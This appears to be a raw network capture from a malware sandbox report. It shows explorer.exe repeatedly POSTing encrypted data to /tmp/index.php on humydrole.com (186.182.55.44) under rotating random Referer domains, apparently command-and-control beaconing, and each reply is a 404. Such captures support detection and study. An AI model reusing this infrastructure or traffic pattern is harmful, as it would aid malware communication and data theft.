                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 218
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.384641886 CET272OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 3c b1 a2
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA .[k,vuO<KM}Cn+;|%JtyKPY=4?^M0BEJ?$T&I c4yD_"AQ`Ddi
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.305275917 CET307INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:29 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 04 00 00 00 72 e8 85 e5
                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                8192.168.2.649742186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.898032904 CET341OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://urjgtucwduxuidlt.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:30.898092031 CET400OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 51 3d f1 86
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuQ=eI`s.5@HWk=F_8[YP/MW*@0Mm4>mI'v#\7Enu@T%}*t`>&8
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:32.141650915 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:31 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                9192.168.2.649743186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.047669888 CET340OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ermwjnjygpbjkmc.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 310
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.047770977 CET364OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 26 0d cc ec
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu&H+^l:2uuO9;TGi*+S=<S{0fcs!X_ej8j5]n{y]:#h*U2
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:33.987519026 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:33 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                10192.168.2.649744186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.275331974 CET340OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://btqeylcvkobgtmo.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 204
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:34.275376081 CET258OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 79 5a d8 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuyZ?vEmf"U]=oqd&llS=w2)V@Wy=p\RVoAp_ah)
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.512032986 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:34 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                11192.168.2.649745186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.790131092 CET336OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qheitjgdckv.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 141
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:35.790131092 CET195OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 33 5d c4 bc
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu3]j|YWqvLAs(1qW2e`F=>/Z6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.709964991 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:36 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                12192.168.2.649746186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.987979889 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://icsxqcqpyvjgr.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 312
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:36.988039970 CET366OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 74 0f b9 fc
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vutJCDfkN X~5|&kZn_9 9*gA>RO[nQBO[u{vz4LB"%SYsk_9kz!/)
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:37.910686970 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:37 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                13192.168.2.649747186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200635910 CET341OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://xuyhyksjejdjybls.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 233
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:38.200686932 CET287OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 71 37 e8 e2
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuq73tY*mFe(pE*g$7Mg*QPe@7X'fRR4rT@wSb/s}heuIl/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.127890110 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:38 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                14192.168.2.649748186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.405524015 CET336OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://irjafvvhjww.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 365
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:39.405559063 CET419OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 40 1a d4 ac
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu@Z&{oA8,'qfW#*,=fEFE>!`Cip0PdA(<8=n3qK#EF<u;h6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.326931000 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:40 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
